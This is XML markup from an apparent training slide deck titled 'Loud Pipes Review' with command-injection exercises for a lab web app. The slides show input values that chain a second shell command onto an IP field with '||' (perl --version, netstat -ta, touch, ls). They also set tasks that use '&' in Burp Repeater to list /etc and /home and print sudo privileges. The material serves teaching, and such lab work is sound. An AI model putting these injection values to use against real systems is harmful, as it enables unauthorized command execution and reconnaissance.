              <a:rPr lang="en" sz="1500"/>
              <a:t>Create a file, then check if it was created</a:t>
            </a:r>
            <a:endParaRPr sz="1500"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1600"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1600"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1237" name="Google Shape;1237;p8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38" name="Google Shape;1238;p82"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="3" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="175" y="2382050"/>
            <a:ext cx="9144000" cy="2524500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="914400" lIns="457200" spcFirstLastPara="1" rIns="457200" wrap="square" tIns="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:highlight>
                <a:srgbClr val="FFFF00"/>
              </a:highlight>
              <a:latin typeface="Roboto Mono"/>
              <a:ea typeface="Roboto Mono"/>
              <a:cs typeface="Roboto Mono"/>
              <a:sym typeface="Roboto Mono"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="8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2" name="Shape 1242"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1243" name="Google Shape;1243;p8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Loud Pipes Review #1</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1244" name="Google Shape;1244;p8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sz="1500">
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Click Command Injection in the left navigation bar, and make sure your security level is set to medium. Use the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1500">
                <a:latin typeface="Courier"/>
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
              </a:rPr>
              <a:t>||</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1500">
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t> to:</a:t>
            </a:r>
            <a:endParaRPr sz="1500">
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-323850" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPts val="1500"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1500"/>
              <a:t>Check the installed version of Perl</a:t>
            </a:r>
            <a:endParaRPr sz="1500"/>
          </a:p>
          <a:p>
            <a:pPr indent="-323850" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPts val="1500"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1500"/>
              <a:t>List running network services (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1500">
                <a:latin typeface="Courier"/>
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
              </a:rPr>
              <a:t>netstat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1500"/>
              <a:t>)</a:t>
            </a:r>
            <a:endParaRPr sz="1500"/>
          </a:p>
          <a:p>
            <a:pPr indent="-323850" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPts val="1500"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1500"/>
              <a:t>Create a file, then check if it was created</a:t>
            </a:r>
            <a:endParaRPr sz="1500"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1600"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1600"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1245" name="Google Shape;1245;p8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46" name="Google Shape;1246;p83"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="3" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="175" y="2382050"/>
            <a:ext cx="9144000" cy="2524500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="914400" lIns="457200" spcFirstLastPara="1" rIns="457200" wrap="square" tIns="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:highlight>
                  <a:srgbClr val="FFD966"/>
                </a:highlight>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t># Check the installed version of Perl</a:t>
            </a:r>
            <a:endParaRPr>
              <a:highlight>
                <a:srgbClr val="FFD966"/>
              </a:highlight>
              <a:latin typeface="Roboto Mono"/>
              <a:ea typeface="Roboto Mono"/>
              <a:cs typeface="Roboto Mono"/>
              <a:sym typeface="Roboto Mono"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:highlight>
                  <a:srgbClr val="FFD966"/>
                </a:highlight>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>bad_ip </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="CC0000"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFD966"/>
                </a:highlight>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>||</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:highlight>
                  <a:srgbClr val="FFD966"/>
                </a:highlight>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t> perl --version</a:t>
            </a:r>
            <a:endParaRPr>
              <a:highlight>
                <a:srgbClr val="FFD966"/>
              </a:highlight>
              <a:latin typeface="Roboto Mono"/>
              <a:ea typeface="Roboto Mono"/>
              <a:cs typeface="Roboto Mono"/>
              <a:sym typeface="Roboto Mono"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:highlight>
                  <a:srgbClr val="FFD966"/>
                </a:highlight>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t># List running network services (`netstat`)</a:t>
            </a:r>
            <a:endParaRPr>
              <a:highlight>
                <a:srgbClr val="FFD966"/>
              </a:highlight>
              <a:latin typeface="Roboto Mono"/>
              <a:ea typeface="Roboto Mono"/>
              <a:cs typeface="Roboto Mono"/>
              <a:sym typeface="Roboto Mono"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:highlight>
                  <a:srgbClr val="FFD966"/>
                </a:highlight>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>bad_ip </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="CC0000"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFD966"/>
                </a:highlight>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>||</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:highlight>
                  <a:srgbClr val="FFD966"/>
                </a:highlight>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t> netstat -ta</a:t>
            </a:r>
            <a:endParaRPr>
              <a:highlight>
                <a:srgbClr val="FFD966"/>
              </a:highlight>
              <a:latin typeface="Roboto Mono"/>
              <a:ea typeface="Roboto Mono"/>
              <a:cs typeface="Roboto Mono"/>
              <a:sym typeface="Roboto Mono"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:highlight>
                  <a:srgbClr val="FFD966"/>
                </a:highlight>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t># Create a file, then check if it was created</a:t>
            </a:r>
            <a:endParaRPr>
              <a:highlight>
                <a:srgbClr val="FFD966"/>
              </a:highlight>
              <a:latin typeface="Roboto Mono"/>
              <a:ea typeface="Roboto Mono"/>
              <a:cs typeface="Roboto Mono"/>
              <a:sym typeface="Roboto Mono"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:highlight>
                  <a:srgbClr val="FFD966"/>
                </a:highlight>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>bad_ip </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="CC0000"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFD966"/>
                </a:highlight>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>||</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:highlight>
                  <a:srgbClr val="FFD966"/>
                </a:highlight>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t> touch experiment</a:t>
            </a:r>
            <a:endParaRPr>
              <a:highlight>
                <a:srgbClr val="FFD966"/>
              </a:highlight>
              <a:latin typeface="Roboto Mono"/>
              <a:ea typeface="Roboto Mono"/>
              <a:cs typeface="Roboto Mono"/>
              <a:sym typeface="Roboto Mono"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="152400" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="145000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:highlight>
                  <a:srgbClr val="FFD966"/>
                </a:highlight>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>bad_ip </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="CC0000"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFD966"/>
                </a:highlight>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>||</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:highlight>
                  <a:srgbClr val="FFD966"/>
                </a:highlight>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t> ls</a:t>
            </a:r>
            <a:endParaRPr>
              <a:highlight>
                <a:srgbClr val="FFD966"/>
              </a:highlight>
              <a:latin typeface="Roboto Mono"/>
              <a:ea typeface="Roboto Mono"/>
              <a:cs typeface="Roboto Mono"/>
              <a:sym typeface="Roboto Mono"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:highlight>
                <a:srgbClr val="FFFF00"/>
              </a:highlight>
              <a:latin typeface="Roboto Mono"/>
              <a:ea typeface="Roboto Mono"/>
              <a:cs typeface="Roboto Mono"/>
              <a:sym typeface="Roboto Mono"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="8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0" name="Shape 1250"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1251" name="Google Shape;1251;p8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Loud Pipes Review #2</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1252" name="Google Shape;1252;p8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300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1500">
                <a:solidFill>
                  <a:srgbClr val="24292E"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Launch Burp Suite. Send an IP address through the form; intercept the request; and send it to Repeater. Use Repeater and the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1500">
                <a:solidFill>
                  <a:srgbClr val="24292E"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
              </a:rPr>
              <a:t>&amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1500">
                <a:solidFill>
                  <a:srgbClr val="24292E"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t> operator to:</a:t>
            </a:r>
            <a:endParaRPr sz="1500">
              <a:solidFill>
                <a:srgbClr val="24292E"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-323850" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="24292E"/>
              </a:buClr>
              <a:buSzPts val="1500"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1500">
                <a:solidFill>
                  <a:srgbClr val="24292E"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>List the contents of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1500">
                <a:solidFill>
                  <a:srgbClr val="24292E"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
              </a:rPr>
              <a:t>/etc</a:t>
            </a:r>
            <a:endParaRPr sz="1500">
              <a:solidFill>
                <a:srgbClr val="24292E"/>
              </a:solidFill>
              <a:latin typeface="Courier"/>
              <a:ea typeface="Courier"/>
              <a:cs typeface="Courier"/>
              <a:sym typeface="Courier"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-323850" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="24292E"/>
              </a:buClr>
              <a:buSzPts val="1500"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1500">
                <a:solidFill>
                  <a:srgbClr val="24292E"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>List the contents of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1500">
                <a:solidFill>
                  <a:srgbClr val="24292E"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
              </a:rPr>
              <a:t>/home</a:t>
            </a:r>
            <a:endParaRPr sz="1500">
              <a:solidFill>
                <a:srgbClr val="24292E"/>
              </a:solidFill>
              <a:latin typeface="Courier"/>
              <a:ea typeface="Courier"/>
              <a:cs typeface="Courier"/>
              <a:sym typeface="Courier"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-323850" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="24292E"/>
              </a:buClr>
              <a:buSzPts val="1500"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1500">
                <a:solidFill>
                  <a:srgbClr val="24292E"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Print the commands you can run with </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1500">
                <a:solidFill>
                  <a:srgbClr val="24292E"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
              </a:rPr>
              <a:t>sudo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1500">
                <a:solidFill>
                  <a:srgbClr val="24292E"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t> (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1500">
                <a:solidFill>
                  <a:srgbClr val="24292E"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
              </a:rPr>
              <a:t>sudo -L</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1500">
                <a:solidFill>
                  <a:srgbClr val="24292E"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
            <a:endParaRPr sz="1500">
              <a:solidFill>
                <a:srgbClr val="24292E"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1500">
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1500"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1500"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1253" name="Google Shape;1253;p8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54" name="Google Shape;1254;p84"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="3" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="175" y="2382050"/>
            <a:ext cx="9144000" cy="2524500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="914400" lIns="457200" spcFirstLastPara="1" rIns="457200" wrap="square" tIns="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:highlight>
                <a:srgbClr val="FFFF00"/>
              </a:highlight>
              <a:latin typeface="Roboto Mono"/>
              <a:ea typeface="Roboto Mono"/>
              <a:cs typeface="Roboto Mono"/>
              <a:sym typeface="Roboto Mono"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="8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8" name="Shape 1258"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1259" name="Google Shape;1259;p8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Loud Pipes Review #2</a:t>
